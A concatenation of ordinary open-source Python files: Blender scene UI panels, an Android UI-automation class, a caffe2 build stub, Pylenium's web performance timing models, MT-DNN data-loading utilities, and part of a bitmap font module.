icon = layout.enum_item_icon(kspath, "id_type", kspath.id_type)
if self.layout_type in {'DEFAULT', 'COMPACT'}:
# Do not make this one editable in uiList for now...
layout.label(text=kspath.data_path, translate=False, icon_value=icon)
elif self.layout_type == 'GRID':
layout.alignment = 'CENTER'
layout.label(text="", icon_value=icon)
class SceneButtonsPanel:
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "scene"
class SCENE_PT_scene(SceneButtonsPanel, Panel):
bl_label = "Scene"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
scene = context.scene
layout.prop(scene, "camera")
layout.prop(scene, "background_set")
layout.prop(scene, "active_clip", text="Active Clip")
class SCENE_PT_unit(SceneButtonsPanel, Panel):
bl_label = "Units"
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
layout = self.layout
unit = context.scene.unit_settings
layout.use_property_split = True
layout.use_property_decorate = False
layout.prop(unit, "system")
col = layout.column()
col.enabled = unit.system != 'NONE'
col.prop(unit, "scale_length")
col.prop(unit, "use_separate")
col = layout.column()
col.prop(unit, "system_rotation", text="Rotation")
subcol = col.column()
subcol.enabled = unit.system != 'NONE'
subcol.prop(unit, "length_unit", text="Length")
subcol.prop(unit, "mass_unit", text="Mass")
subcol.prop(unit, "time_unit", text="Time")
subcol.prop(unit, "temperature_unit", text="Temperature")
class SceneKeyingSetsPanel:
@staticmethod
def draw_keyframing_settings(context, layout, ks, ksp):
SceneKeyingSetsPanel._draw_keyframing_setting(
context, layout, ks, ksp, "Needed",
"use_insertkey_override_needed", "use_insertkey_needed",
userpref_fallback="use_keyframe_insert_needed",
)
SceneKeyingSetsPanel._draw_keyframing_setting(
context, layout, ks, ksp, "Visual",
"use_insertkey_override_visual", "use_insertkey_visual",
userpref_fallback="use_visual_keying",
)
SceneKeyingSetsPanel._draw_keyframing_setting(
context, layout, ks, ksp, "XYZ to RGB",
"use_insertkey_override_xyz_to_rgb", "use_insertkey_xyz_to_rgb",
)
@staticmethod
def _draw_keyframing_setting(context, layout, ks, ksp, label, toggle_prop, prop, userpref_fallback=None):
if ksp:
item = ksp
if getattr(ks, toggle_prop):
owner = ks
propname = prop
else:
owner = context.preferences.edit
if userpref_fallback:
propname = userpref_fallback
else:
propname = prop
else:
item = ks
owner = context.preferences.edit
if userpref_fallback:
propname = userpref_fallback
else:
propname = prop
row = layout.row(align=True)
subrow = row.row(align=True)
subrow.active = getattr(item, toggle_prop)
if subrow.active:
subrow.prop(item, prop, text=label)
else:
subrow.prop(owner, propname, text=label)
row.prop(item, toggle_prop, text="", icon='STYLUS_PRESSURE', toggle=True) # XXX: needs dedicated icon
class SCENE_PT_keying_sets(SceneButtonsPanel, SceneKeyingSetsPanel, Panel):
bl_label = "Keying Sets"
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
layout = self.layout
scene = context.scene
row = layout.row()
col = row.column()
col.template_list("UI_UL_list", "keying_sets", scene, "keying_sets", scene.keying_sets, "active_index", rows=1)
col = row.column(align=True)
col.operator("anim.keying_set_add", icon='ADD', text="")
col.operator("anim.keying_set_remove", icon='REMOVE', text="")
layout.use_property_split = True
layout.use_property_decorate = False # No animation.
flow = layout.grid_flow(row_major=False, columns=0, even_columns=False, even_rows=False, align=False)
ks = scene.keying_sets.active
if ks and ks.is_path_absolute:
col = flow.column()
col.prop(ks, "bl_description")
subcol = flow.column()
subcol.operator_context = 'INVOKE_DEFAULT'
subcol.operator("anim.keying_set_export", text="Export to File").filepath = "keyingset.py"
class SCENE_PT_keyframing_settings(SceneButtonsPanel, SceneKeyingSetsPanel, Panel):
bl_label = "Keyframing Settings"
bl_parent_id = "SCENE_PT_keying_sets"
@classmethod
def poll(cls, context):
ks = context.scene.keying_sets.active
return (ks and ks.is_path_absolute)
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False # No animation.
scene = context.scene
ks = scene.keying_sets.active
flow = layout.grid_flow(row_major=True, columns=0, even_columns=False, even_rows=False, align=True)
col = flow.column(align=True)
col.alignment = 'RIGHT'
col.label(text="General Override")
self.draw_keyframing_settings(context, col, ks, None)
ksp = ks.paths.active
if ksp:
col.separator()
col = flow.column(align=True)
col.alignment = 'RIGHT'
col.label(text="Active Set Override")
self.draw_keyframing_settings(context, col, ks, ksp)
class SCENE_PT_keying_set_paths(SceneButtonsPanel, SceneKeyingSetsPanel, Panel):
bl_label = "Active Keying Set"
bl_parent_id = "SCENE_PT_keying_sets"
@classmethod
def poll(cls, context):
ks = context.scene.keying_sets.active
return (ks and ks.is_path_absolute)
def draw(self, context):
layout = self.layout
scene = context.scene
ks = scene.keying_sets.active
row = layout.row()
row.label(text="Paths:")
row = layout.row()
col = row.column()
col.template_list("SCENE_UL_keying_set_paths", "", ks, "paths", ks.paths, "active_index", rows=1)
col = row.column(align=True)
col.operator("anim.keying_set_path_add", icon='ADD', text="")
col.operator("anim.keying_set_path_remove", icon='REMOVE', text="")
# TODO: 1) the template_any_ID needs to be fixed for the text alignment.
# 2) use_property_decorate has to properly skip the non animatable properties.
# Properties affected with needless draw:
# group_method, template_any_ID dropdown, use_entire_array
layout.use_property_split = True
layout.use_property_decorate = False # No animation (remove this later on).
flow = layout.grid_flow(row_major=False, columns=0, even_columns=False, even_rows=False, align=True)
ksp = ks.paths.active
if ksp:
col = flow.column(align=True)
col.alignment = 'RIGHT'
col.template_any_ID(ksp, "id", "id_type", text="Target ID-Block")
col.separator()
col.template_path_builder(ksp, "data_path", ksp.id, text="Data Path")
col = flow.column()
col.prop(ksp, "use_entire_array", text="Array All Items")
if not ksp.use_entire_array:
col.prop(ksp, "array_index", text="Index")
col.separator()
col.prop(ksp, "group_method", text="F-Curve Grouping")
if ksp.group_method == 'NAMED':
col.prop(ksp, "group")
class SCENE_PT_audio(SceneButtonsPanel, Panel):
bl_label = "Audio"
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
layout = self.layout
layout.use_property_split = True
scene = context.scene
flow = layout.grid_flow(row_major=True, columns=0, even_columns=True, even_rows=False, align=True)
col = flow.column()
col.prop(scene, "audio_volume")
col.separator()
col = col.column(align=True)
col.prop(scene, "audio_distance_model")
col.prop(scene, "audio_doppler_speed", text="Doppler Speed")
col.prop(scene, "audio_doppler_factor", text="Doppler Factor")
col.separator()
layout.operator("sound.bake_animation")
class SCENE_PT_physics(SceneButtonsPanel, Panel):
bl_label = "Gravity"
bl_options = {'DEFAULT_CLOSED'}
def draw_header(self, context):
self.layout.prop(context.scene, "use_gravity", text="")
def draw(self, context):
layout = self.layout
layout.use_property_split = True
scene = context.scene
layout.active = scene.use_gravity
layout.prop(scene, "gravity")
class SCENE_PT_rigid_body_world(SceneButtonsPanel, Panel):
bl_label = "Rigid Body World"
bl_options = {'DEFAULT_CLOSED'}
def draw_header(self, context):
scene = context.scene
rbw = scene.rigidbody_world
if rbw is not None:
self.layout.prop(rbw, "enabled", text="")
def draw(self, context):
layout = self.layout
layout.use_property_split = True
scene = context.scene
rbw = scene.rigidbody_world
if rbw is None:
layout.operator("rigidbody.world_add")
else:
layout.operator("rigidbody.world_remove")
class RigidBodySubPanel(SceneButtonsPanel):
bl_parent_id = "SCENE_PT_rigid_body_world"
@classmethod
def poll(cls, context):
scene = context.scene
return scene and scene.rigidbody_world
class SCENE_PT_rigid_body_world_settings(RigidBodySubPanel, Panel):
bl_label = "Settings"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
scene = context.scene
rbw = scene.rigidbody_world
if rbw:
flow = layout.grid_flow(row_major=True, columns=0, even_columns=True, even_rows=False, align=True)
col = flow.column()
col.active = rbw.enabled
col = col.column()
col.prop(rbw, "collection")
col.prop(rbw, "constraints")
col = col.column()
col.prop(rbw, "time_scale", text="Speed")
col = flow.column()
col.active = rbw.enabled
col.prop(rbw, "use_split_impulse")
col = col.column()
col.prop(rbw, "substeps_per_frame")
col.prop(rbw, "solver_iterations")
class SCENE_PT_rigid_body_cache(RigidBodySubPanel, Panel):
bl_label = "Cache"
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
scene = context.scene
rbw = scene.rigidbody_world
point_cache_ui(self, rbw.point_cache, rbw.point_cache.is_baked is False and rbw.enabled, 'RIGID_BODY')
class SCENE_PT_rigid_body_field_weights(RigidBodySubPanel, Panel):
bl_label = "Field Weights"
bl_parent_id = "SCENE_PT_rigid_body_world"
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
scene = context.scene
rbw = scene.rigidbody_world
effector_weights_ui(self, rbw.effector_weights, 'RIGID_BODY')
class SCENE_PT_custom_props(SceneButtonsPanel, PropertyPanel, Panel):
_context_path = "scene"
_property_type = bpy.types.Scene
classes = (
SCENE_UL_keying_set_paths,
SCENE_PT_scene,
SCENE_PT_unit,
SCENE_PT_physics,
SCENE_PT_keying_sets,
SCENE_PT_keying_set_paths,
SCENE_PT_keyframing_settings,
SCENE_PT_audio,
SCENE_PT_rigid_body_world,
SCENE_PT_rigid_body_world_settings,
SCENE_PT_rigid_body_cache,
SCENE_PT_rigid_body_field_weights,
SCENE_PT_custom_props,
)
if __name__ == "__main__": # only for live edit.
from bpy.utils import register_class
for cls in classes:
register_class(cls)
|
python_uiautomator/ui_object.py | maksonlee/android-uiconductor | 113 | 12610898 | #!/usr/bin/python
#
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""UiObject is the class that stores the UiObject for automation.
It contains xml info and a selector for a certain component.
"""
from .constant import DirectionType
from .xml_parser import XmlParser
class UiObject():
"""UiObject class for python_uiautomator, stands for UiObject class in uiautomator.
Attributes:
selector: corresponding UiSelector of the current UiObject.
android_device_driver: android_device_driver for android device.
"""
def __init__(self, selector, android_device_driver):
self.selector = selector
self.android_device_driver = android_device_driver
def attributes(self, attrib_key, attrib_value, match_option=None):
"""Adds attributes locator with attrib_key=attrib_value to selector of current UiObject.
Note: attributes("text", "Chrome") would add a requirement of text=Chrome to
the current UiObject.
Args:
attrib_key: the key of the attribute.
attrib_value: the value of the attribute
match_option: the option for advanced matching
Returns:
New UiObject with attributes selector appended in selector.
"""
new_selector = self.selector.attributes(attrib_key, attrib_value,
match_option)
return UiObject(new_selector, self.android_device_driver)
def click(self):
"""Performs click action on element specified by current UiObject.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
parser = XmlParser(self.android_device_driver.fetch_current_xml())
point = parser.get_position_by_selector(self.selector)
self.android_device_driver.click(point.x, point.y)
def swipe(self, direction=DirectionType.RIGHT):
"""Performs click action on element specified by current UiObject.
Note this action will swipe from the center of current UiObject to its edge
according to the given direction.
Args:
direction: DirectionType which provides on which way to swipe,
DirectionType.RIGHT is default value.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
parser = XmlParser(self.android_device_driver.fetch_current_xml())
point = parser.get_position_by_selector(self.selector)
if point.x <= 0 and point.y <= 0:
return
bounds = parser.get_bounds_by_selector(self.selector)
dest_x, dest_y = 0, 0
if direction == DirectionType.UP:
dest_x, dest_y = point.x, bounds[1]
elif direction == DirectionType.DOWN:
dest_x, dest_y = point.x, bounds[3]
elif direction == DirectionType.LEFT:
dest_x, dest_y = bounds[0], point.y
elif direction == DirectionType.RIGHT:
dest_x, dest_y = bounds[2], point.y
self.android_device_driver.swipe(point.x, point.y, dest_x, dest_y)
def child(self, child_index):
"""Adds child to selector of current UiObject.
User can select nth child based on the parent:
Args:
child_index: index of the child.
Returns:
New UiObject contains one extra children selector.
"""
new_selector = self.selector.child(child_index)
return UiObject(new_selector, self.android_device_driver)
def index(self, index):
"""Gets the indexth UiObject that matches its UiSelector.
User can select nth child based on the parent:
Args:
index: index of the UiObject.
Returns:
New UiObject contains one extra index selector.
"""
new_selector = self.selector.index(index)
return UiObject(new_selector, self.android_device_driver)
def custom_matcher(self, fn):
"""Adds custom matcher to selector of current UiObject.
User can define a match function. for example:
UiSelector().custom_matcher(lambda n: n.get("text") == 'Phone')
Args:
fn: the match function provided by user.
Returns:
New UiObject contains one extra custom_matcher selector.
"""
new_selector = self.selector.custom_matcher(fn)
return UiObject(new_selector, self.android_device_driver)
def parent(self):
"""Adds parent symbol to selector of current UiObject.
Returns:
New UiObject with "PARENT" appended in UiSelector's locator.
"""
parent_selector = self.selector.parent()
return UiObject(parent_selector, self.android_device_driver)
def sibling(self):
"""Adds sibling to selector of current UiObject.
Returns:
New UiObject contains one extra sibling selector.
"""
new_selector = self.selector.sibling()
return UiObject(new_selector, self.android_device_driver)
def text(self, value, match_option=None):
"""Adds text locator to selector of current UiObject.
For this locator our framework will search in 'text' and field.
Args:
value: the text we are looking for.
match_option: the match option for the text
Returns:
New UiObject with "Text" appended in UiSelector's locator.
"""
return self.attributes("text", value, match_option)
def get_attributes(self):
"""Get the attribute list of the selected UiObject.
Returns:
List of (name, value) pairs for attributes.
"""
parser = XmlParser(self.android_device_driver.fetch_current_xml())
node = parser.find_first_element_by_selector(self.selector)
return node.items()
def verify(self, key, value):
"""Verify is selected key, value pair exists the selected UiObject.
Match is case insensitive.
Args:
key: the key for verification
value: the desired value under key.
Returns:
True if exists, else false.
"""
parser = XmlParser(self.android_device_driver.fetch_current_xml())
node = parser.find_first_element_by_selector(self.selector)
if key in node.keys():
if node.get(key).lower() == value.lower():
return True
return False
def content_desc(self, value, match_option=None):
"""Adds description locator to selector of current UiObject.
For this locator our framework will search in 'content-desc' field.
Args:
value: the text we are looking for.
match_option: the match option for the text
Returns:
New UiObject with "content-desc" appended in UiSelector's locator.
"""
return self.attributes("content-desc", value, match_option)
def resource_id(self, value, match_option=None):
"""Adds resource_id locator to selector of current UiObject.
For this locator our framework will search in 'resource-id' field.
Args:
value: the text we are looking for.
match_option: the match option for the text
Returns:
New UiObject with "resource_id" appended in UiSelector's locator.
"""
return self.attributes("resource-id", value, match_option)
def verify_exist(self):
"""Verify whether the element specified by the current UiObject exists.
Returns:
True if the element exists, false otherwise.
"""
parser = XmlParser(self.android_device_driver.fetch_current_xml())
node = parser.find_first_element_by_selector(self.selector)
if node is None:
return False
else:
return True
def left(self):
"""Adds left symbol to selector of current UiObject.
Returns:
New UiObject with "(Location.DIRECTION, DirectionType.LEFT)" appended in
UiSelector's locator.
"""
left_selector = self.selector.left()
return UiObject(left_selector, self.android_device_driver)
def right(self):
"""Adds right symbol to selector of current UiObject.
Returns:
New UiObject with "(Location.DIRECTION, DirectionType.RIGHT)" appended in
UiSelector's locator.
"""
right_selector = self.selector.right()
return UiObject(right_selector, self.android_device_driver)
def up(self):
"""Adds up symbol to selector of current UiObject.
Returns:
New UiObject with "(Location.DIRECTION, DirectionType.UP)" appended in
UiSelector's locator.
"""
up_selector = self.selector.up()
return UiObject(up_selector, self.android_device_driver)
def down(self):
"""Adds down symbol to selector of current UiObject.
Returns:
New UiObject with "(Location.DIRECTION, DirectionType.DOWN)" appended in
UiSelector's locator.
"""
down_selector = self.selector.down()
return UiObject(down_selector, self.android_device_driver)
def get_bounds(self):
"""Gets the bounds of UIElement specified by current UiObject.
Returns:
The bounds of current UIElement [X1, Y1, X2, Y2]
"""
parser = XmlParser(self.android_device_driver.fetch_current_xml())
return parser.get_bounds_by_selector(self.selector)
def get_center_pos(self):
"""Gets center position of UIElement specified by current UiObject.
Returns:
The center position of current UIElement [X1, Y1]
"""
parser = XmlParser(self.android_device_driver.fetch_current_xml())
return parser.get_position_by_selector(self.selector)
|
caffe2/python/build.py | Hacky-DH/pytorch | 60,067 | 12610923 |
import caffe2.python._import_c_extension as C
CAFFE2_NO_OPERATOR_SCHEMA = C.define_caffe2_no_operator_schema
build_options = C.get_build_options()
|
pylenium/performance.py | gleekzorp/pyleniumio | 169 | 12610925 | <filename>pylenium/performance.py
import logging
import time
from typing import Union, List, Optional
from pydantic import BaseModel, Field
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.wait import WebDriverWait
def stopwatch(func):
""" Stopwatch Decorator.
Use this decorator on any function to measure how long it took
for the function to complete. This is in seconds, but may have fractions of a second
if the system clock provides more precision.
Notes:
This is _logged_, not printed to the Terminal
Examples:
1. How long does it take to add an item to the cart?
@stopwatch
def add_item_to_cart(py):
py.get('#add-item').click()
py.get('#added-notification').should().be_visible()
2. How long does it take to edit an item's available stock via the API
and see it change in the UI?
@stopwatch
def update_available_stock(py, item, quantity):
payload = {'item': item, 'qty': quantity}
api.items.update(payload)
py.get(f'#available-stock-{item}').should().have_text(quantity)
"""
def wrapper(*args, **kwargs):
log = logging.getLogger('driver')
start_time = time.time()
func(*args, **kwargs)
stop_time = time.time()
func_name = func.__name__
log.info(f'STOPWATCH - {func_name} took {stop_time - start_time} seconds')
return wrapper
class Performance:
""" Pylenium's Performance API. """
def __init__(self, webdriver):
self._webdriver = webdriver
def _wait(self, timeout=10):
return WebDriverWait(self._webdriver, timeout=timeout)
def get(self):
""" The main method used to generate a WebPerformance object from the current web page.
Notes:
Calling this method too soon may yield NoneTypes because the browser hasn't generated them yet.
Examples:
# Store the entire WebPerformance object and log it
perf = py.performance.get()
py.log.info(perf.dict())
# Get a single data point from WebPerformance
tti = py.performance.get().time_to_interactive()
"""
return WebPerformance(
time_origin=self.get_time_origin(),
navigation_timing=self.get_navigation_timing(),
paint_timing=self.get_paint_timing(),
resources=self.get_resources()
)
def get_time_origin(self) -> float:
""" Returns the timeOrigin precision value.
This is the high resolution timestamp of the start time of the performance measurement.
"""
js = 'return window.performance.timeOrigin;'
time_origin = self._wait().until(lambda driver: driver.execute_script(js), 'Time Origin not generated yet')
return time_origin
def get_navigation_timing(self):
""" Return the PerformanceNavigationTiming object as a Python object. """
js = 'return window.performance.getEntriesByType("navigation")[0];'
navigation = self._wait().until(lambda driver: driver.execute_script(js), 'NavigationTiming not generated yet')
return NavigationTiming(**navigation)
def get_paint_timing(self):
""" Return the PerformancePaintTiming object as a Python object. """
js = 'return window.performance.getEntriesByName("first-contentful-paint")[0];'
paint = self._wait().until(lambda driver: driver.execute_script(js), 'PaintTiming not generated yet')
return PaintTiming(**paint)
def get_resources(self):
""" Return a list of PerformanceResourceTiming objects as Python objects. """
js = 'return window.performance.getEntriesByType("resource");'
try:
resources = self._wait().until(
lambda driver: driver.execute_script(js),
message='Resources not generated yet or there are none')
return [ResourceTiming(**resource) for resource in resources]
except TimeoutException:
return None # because there were no Resources captured for the current web page
class NavigationTiming(BaseModel):
""" The PerformanceNavigationTiming Representation.
Metrics regarding the browser's document navigation events
References:
https://developer.mozilla.org/en-US/docs/Web/API/PerformanceNavigationTiming
"""
connect_end: float = Field(alias='connectEnd')
connect_start: float = Field(alias='connectStart')
decoded_body_size: Union[int, float] = Field(alias='decodedBodySize')
dom_complete: float = Field(alias='domComplete')
dom_content_loaded_event_end: float = Field(alias='domContentLoadedEventEnd')
dom_content_loaded_event_start: float = Field(alias='domContentLoadedEventStart')
time_to_interactive: float = Field(alias='domInteractive')
domain_lookup_end: float = Field(alias='domainLookupEnd')
domain_lookup_start: float = Field(alias='domainLookupStart')
duration: float
encoded_body_size: Union[int, float] = Field(alias='encodedBodySize')
entry_type: str = Field(alias='entryType')
fetch_start: float = Field(alias='fetchStart')
initiator_type: str = Field(alias='initiatorType')
load_event_end: float = Field(alias='loadEventEnd')
load_event_start: float = Field(alias='loadEventStart')
name: str
next_hop_protocol: str = Field(alias='nextHopProtocol')
redirect_count: int = Field(alias='redirectCount')
redirect_end: int = Field(alias='redirectEnd')
redirect_start: int = Field(alias='redirectStart')
request_start: float = Field(alias='requestStart')
response_end: float = Field(alias='responseEnd')
response_start: float = Field(alias='responseStart')
secure_connection_start: float = Field(alias='secureConnectionStart')
server_timing: List = Field(alias='serverTiming')
start_time: int = Field(alias='startTime')
transfer_size: Union[int, float] = Field(alias='transferSize')
type: str
unload_event_end: int = Field(alias='unloadEventEnd')
unload_event_start: int = Field(alias='unloadEventStart')
worker_start: Union[int, float] = Field(alias='workerStart')
class PaintTiming(BaseModel):
""" The PerformancePaintTiming Representation.
Provides timing information about "paint" (also called "render") operations during web page construction.
References:
https://developer.mozilla.org/en-US/docs/Web/API/PerformancePaintTiming
"""
duration: float
entry_type: str = Field(alias='entryType', default='paint')
name: str = Field(default='first-contentful-paint')
start_time: float = Field(alias='startTime')
class ResourceTiming(BaseModel):
""" The PerformanceResourceTiming Representation.
Detailed network timing data regarding the loading of an application's resources.
An application can use the timing metrics to determine, for example, the length of time it takes
to fetch a specific resource, such as an XMLHttpRequest, <SVG>, image, or script.
References:
https://developer.mozilla.org/en-US/docs/web/api/performanceresourcetiming
"""
connect_end: float = Field(alias='connectEnd')
connect_start: float = Field(alias='connectStart')
decoded_body_size: int = Field(alias='decodedBodySize')
domain_lookup_end: float = Field(alias='domainLookupEnd')
domain_lookup_start: float = Field(alias='domainLookupStart')
duration: float
encoded_body_size: int = Field(alias='encodedBodySize')
entry_type: str = Field(alias='entryType', default='resource')
fetch_start: float = Field(alias='fetchStart')
initiator_type: str = Field(alias='initiatorType')
name: str
next_hop_protocol: str = Field(alias='nextHopProtocol')
redirect_end: float = Field(alias='redirectEnd')
redirect_start: float = Field(alias='redirectStart')
request_start: float = Field(alias='requestStart')
response_end: float = Field(alias='responseEnd')
response_start: float = Field(alias='responseStart')
secure_connection_start: float = Field(alias='secureConnectionStart')
server_timing: List = Field(alias='serverTiming')
start_time: float = Field(alias='startTime')
transfer_size: int = Field(alias='transferSize')
worker_start: float = Field(alias='workerStart')
class WebPerformance(BaseModel):
""" Pylenium's WebPerformance Object.
This is built using multiple W3C Performance Timing objects to provide
custom data points like:
* Page Load Time
* Time to First Contentful Paint
* Time to Interactive (TTI)
* and more!
"""
time_origin: float # High resolution timestamp of the start time of the Performance measurement
navigation_timing: NavigationTiming
paint_timing: PaintTiming
resources: List[ResourceTiming]
def page_load_time(self) -> float:
""" The time it takes for the page to load as experienced by the user. """
return self.navigation_timing.load_event_end - self.navigation_timing.start_time
def time_to_first_byte(self) -> float:
""" The time it takes before the first byte of response is received from the server. """
return self.navigation_timing.response_start
def time_to_first_contentful_paint(self) -> float:
""" The time it takes for the majority of content to be fully rendered and consumable by the user. """
return self.paint_timing.start_time
def time_to_interactive(self) -> float:
""" The time it takes for the layout to be stabilized and the page is responsive. """
return self.navigation_timing.dom_complete
def number_of_requests(self) -> int:
""" The number of requests sent from start of navigation until end of page load. """
return len(self.resources)
def time_to_dom_content_loaded(self) -> float:
return self.navigation_timing.dom_content_loaded_event_end
def page_weight(self) -> float:
""" The amount of bytes transferred for the page to be loaded. """
resource_transfer_size = sum([r.transfer_size for r in self.resources])
return self.navigation_timing.transfer_size + resource_transfer_size
def connection_time(self) -> float:
""" The time taken to connect to the server. """
return self.navigation_timing.connect_end - self.navigation_timing.connect_start
def request_time(self) -> float:
""" The time taken to send a request to the server and receive the response. """
return self.navigation_timing.response_end - self.navigation_timing.response_start
def fetch_time(self) -> float:
""" The time to complete the document fetch (including accessing any caches, etc.). """
return self.navigation_timing.response_end - self.navigation_timing.fetch_start
|
mtdnn/common/tokenization_utils.py | microsoft/mt-dnn | 113 | 12610948 | <gh_stars>100-1000
# coding=utf-8
# Copyright (c) Microsoft. All rights reserved.
import json
from typing import Union
import numpy as np
from mtdnn.common.types import DataFormat, TaskType, TaskDefType
from mtdnn.tasks.config import get_task_obj
def load_task_data(
file_path_or_processed_data_list: Union[str, list], task_def: TaskDefType
):
"""Load data in MT-DNN Format
Arguments:
file_path_or_processed_data_list {Union[str, list]} -- File path or processed rows object
task_def {dict} -- Task Definition to be loaded
Raises:
ValueError: Invalid Task requested
Returns:
list -- list of processed data in MT-DNN Format
"""
assert task_def, "[ERROR] - Task Definition cannot be none"
data_format = task_def.data_format
task_type = task_def.task_type
label_dict = task_def.label_vocab
if task_type == TaskType.Ranking:
assert data_format == DataFormat.PremiseAndMultiHypothesis
if isinstance(file_path_or_processed_data_list, str):
processed_data = open(file_path_or_processed_data_list, encoding="utf-8")
elif isinstance(file_path_or_processed_data_list, list):
processed_data = file_path_or_processed_data_list
rows = []
for line in processed_data:
fields = line.strip("\n").split("\t")
if data_format == DataFormat.PremiseOnly:
assert len(fields) == 3
row = {"uid": fields[0], "label": fields[1], "premise": fields[2]}
elif data_format == DataFormat.PremiseAndOneHypothesis:
assert len(fields) == 4
row = {
"uid": fields[0],
"label": fields[1],
"premise": fields[2],
"hypothesis": fields[3],
}
elif data_format == DataFormat.PremiseAndMultiHypothesis:
assert len(fields) > 5
row = {
"uid": fields[0],
"ruid": fields[1].split(","),
"label": fields[2],
"premise": fields[3],
"hypothesis": fields[4:],
}
elif data_format == DataFormat.Sequence:
row = {
"uid": fields[0],
"label": eval(fields[1]),
"premise": eval(fields[2]),
}
elif data_format == DataFormat.MRC:
row = {
"uid": fields[0],
"label": fields[1],
"premise": fields[2],
"hypothesis": fields[3],
}
else:
raise ValueError(data_format)
task_obj = get_task_obj(task_def)
if task_obj is not None:
row["label"] = task_obj.input_parse_label(row["label"])
elif task_type == TaskType.Ranking:
labels = row["label"].split(",")
if label_dict is not None:
labels = [label_dict[label] for label in labels]
else:
labels = [float(label) for label in labels]
row["label"] = int(np.argmax(labels))
row["olabel"] = labels
elif task_type == TaskType.Span:
pass # don't process row label
elif task_type == TaskType.SequenceLabeling:
assert type(row["label"]) is list
row["label"] = [label_dict[label] for label in row["label"]]
rows.append(row)
return rows
def load_score_file(score_path: str = "", n_class: int = 1):
sample_id_2_pred_score_seg_dic = {}
score_obj = json.loads(open(score_path, encoding="utf-8").read())
assert (len(score_obj["scores"]) % len(score_obj["uids"]) == 0) and (
len(score_obj["scores"]) / len(score_obj["uids"]) == n_class
), "[ERROR] - scores column size should equal to sample count or multiple of sample count (for classification problem)"
scores = score_obj["scores"]
score_segs = [
scores[i * n_class : (i + 1) * n_class] for i in range(len(score_obj["uids"]))
]
for sample_id, pred, score_seg in zip(
score_obj["uids"], score_obj["predictions"], score_segs
):
sample_id_2_pred_score_seg_dic[sample_id] = (pred, score_seg)
return sample_id_2_pred_score_seg_dic
|
minihinch/gui/fonts/arial_50.py | aabbtree77/esp32-mqtt-experiments | 198 | 12610957 | # Code generated by font_to_py.py.
# Font: Arial.ttf Char set: 0123456789:
# Cmd: ./font_to_py.py Arial.ttf 50 arial_50.py -x -c 0123456789:
version = '0.33'
def height():
return 50
def baseline():
return 49
def max_width():
return 37
def hmap():
return True
def reverse():
return False
def monospaced():
return False
def min_ch():
return 48
def max_ch():
return 63
_font =\
b'\x25\x00\x00\x03\xfe\x00\x00\x00\x1f\xff\xc0\x00\x00\x7f\xff\xf0'\
b'\x00\x00\xff\xff\xf8\x00\x01\xff\xff\xfc\x00\x03\xff\xff\xfe\x00'\
b'\x07\xfe\x03\xff\x00\x07\xf8\x00\xff\x80\x0f\xf0\x00\x7f\x80\x0f'\
b'\xe0\x00\x3f\x80\x0f\xc0\x00\x1f\xc0\x1f\xc0\x00\x1f\xc0\x1f\xc0'\
b'\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x03\x80\x00\x0f\xc0\x00\x00\x00'\
b'\x0f\xc0\x00\x00\x00\x0f\xc0\x00\x00\x00\x1f\x80\x00\x00\x00\x3f'\
b'\x80\x00\x00\x00\x7f\x00\x00\x00\x00\xff\x00\x00\x00\x01\xfe\x00'\
b'\x00\x00\x03\xfc\x00\x00\x00\x07\xf8\x00\x00\x00\x0f\xf0\x00\x00'\
b'\x00\x1f\xe0\x00\x00\x00\x3f\xc0\x00\x00\x00\x7f\x80\x00\x00\x00'\
b'\x7f\x00\x00\x00\x00\xfe\x00\x00\x00\x00\xfc\x00\x00\x00\x01\xfc'\
b'\x00\x00\x00\x01\xfc\x00\x00\x00\x01\xf8\x00\x00\x00\x01\xf8\x00'\
b'\x00\x00\x01\xf8\x00\x00\x00\x01\xf8\x00\x00\x00\x01\xf8\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xf8\x00\x00\x00\x01'\
b'\xf8\x00\x00\x00\x01\xf8\x00\x00\x00\x01\xf8\x00\x00\x00\x01\xf8'\
b'\x00\x00\x00\x01\xf8\x00\x00\x00\x00\x00\x00\x00\x25\x00\x00\x00'\
b'\x00\x00\x00\x00\x03\xfe\x00\x00\x00\x0f\xff\x80\x00\x00\x3f\xff'\
b'\xe0\x00\x00\x7f\xff\xf0\x00\x00\xff\xff\xf8\x00\x01\xff\xff\xfc'\
b'\x00\x03\xfe\x07\xfc\x00\x03\xfc\x01\xfe\x00\x07\xf0\x00\xfe\x00'\
b'\x07\xf0\x00\x7f\x00\x07\xe0\x00\x3f\x00\x0f\xe0\x00\x3f\x00\x0f'\
b'\xc0\x00\x1f\x80\x0f\xc0\x00\x1f\x80\x0f\xc0\x00\x1f\x80\x0f\xc0'\
b'\x00\x1f\x80\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00'\
b'\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f'\
b'\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0'\
b'\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f'\
b'\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80'\
